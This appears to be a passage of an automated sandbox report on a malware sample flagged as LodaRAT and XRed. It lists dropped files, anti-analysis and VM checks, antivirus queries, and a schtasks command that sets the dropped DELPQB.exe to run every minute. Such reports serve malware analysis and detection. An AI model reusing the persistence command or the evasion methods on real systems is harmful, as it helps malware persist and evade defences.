Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Window / User API: threadDelayed 5126			Jump to behavior
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Window / User API: foregroundWindowGot 1532			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	API coverage: 7.4 %
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	API coverage: 3.7 %

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe TID: 8012	Thread sleep time: -51260s >= -30000s	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5900	Thread sleep time: -840000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3456	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Thread sleep count: Count: 5126 delay: -10

Jump to behavior

Source: Yara match	File source: 00000002.00000002.2669135026.00000000048EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2657472452.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2657921440.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ._cache_FGNEBI.exe PID: 8008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 8180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, type: DROPPED

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DADD92 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00DADD92
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DE2044
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00DE219F
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DE24A9
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_00DD6B3F
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_00DD6E4A
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DDF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00DDF350
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DDFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00DDFDD2
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DDFD47 FindFirstFileW,FindClose,	2_2_00DDFD47
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00232044
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_0023219F
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_002324A9
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	10_2_00226B3F
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	10_2_00226E4A
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_0022F350
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0022FD47 FindFirstFileW,FindClose,	10_2_0022FD47
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,	10_2_001FDD92
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_0022FDD2

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

2_2_00DAE47B

Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000			Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: VMware
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.15.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.15.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.15.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.15.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: ._cache_FGNEBI.exe, 00000002.00000002.2659885388.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.15.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.15.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.15.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: ._cache_FGNEBI.exe, 00000002.00000002.2661349834.0000000001448000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: Amcache.hve.15.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.15.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.15.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.15.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.15.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.15.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.15.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	API call chain: ExitProcess graph end node			graph_2-107573
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	API call chain: ExitProcess graph end node			graph_2-104596

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DE703C BlockInput,

2_2_00DE703C

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00D9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

2_2_00D9374E

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DC46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

2_2_00DC46D0

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00EF30B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00EF30B0

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DBA937 GetProcessHeap,

2_2_00DBA937

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB8E19 SetUnhandledExceptionFilter,	2_2_00DB8E19
Source: C:\Users\user\Desktop\._cache_FGNEBI.exe	Code function: 2_2_00DB8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00DB8E3C
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00208E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00208E3C
Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe	Code function: 10_2_00208E19 SetUnhandledExceptionFilter,	10_2_00208E19

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DCBE95 LogonUserW,

2_2_00DCBE95

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00D9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,

2_2_00D9374E

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DD4B52 SendInput,keybd_event,

2_2_00DD4B52

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DD7DD5 mouse_event,

2_2_00DD7DD5

Source: C:\Users\user\Desktop\FGNEBI.exe	Process created: C:\Users\user\Desktop\._cache_FGNEBI.exe "C:\Users\user\Desktop\._cache_FGNEBI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FGNEBI.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1	Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DCB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

2_2_00DCB398

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DCBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

2_2_00DCBE31

Source: ._cache_FGNEBI.exe, DELPQB.exe	Binary or memory string: Shell_TrayWnd
Source: ._cache_FGNEBI.exe, 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmp, DELPQB.exe, 0000000A.00000002.1546035160.000000000028E000.00000040.00000001.01000000.00000009.sdmp, DELPQB.exe, 00000010.00000002.1559017213.000000000028E000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DB7254 cpuid

2_2_00DB7254

Source: C:\Users\user\Desktop\FGNEBI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DB40DA GetSystemTimeAsFileTime,__aulldiv,

2_2_00DB40DA

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00E0C146 GetUserNameW,

2_2_00E0C146

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DC2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_00DC2C3C

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

Code function: 2_2_00DAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

2_2_00DAE47B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: ._cache_FGNEBI.exe, 00000002.00000002.2659885388.000000000141A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\._cache_FGNEBI.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

Stealing of Sensitive Information

Yara detected LodaRAT

Source: Yara match

File source: Process Memory Space: ._cache_FGNEBI.exe PID: 8008, type: MEMORYSTR

Yara detected XRed

Source: Yara match	File source: FGNEBI.exe, type: SAMPLE
Source: Yara match	File source: 0.0.FGNEBI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FGNEBI.exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Synaptics.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX5CF5.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

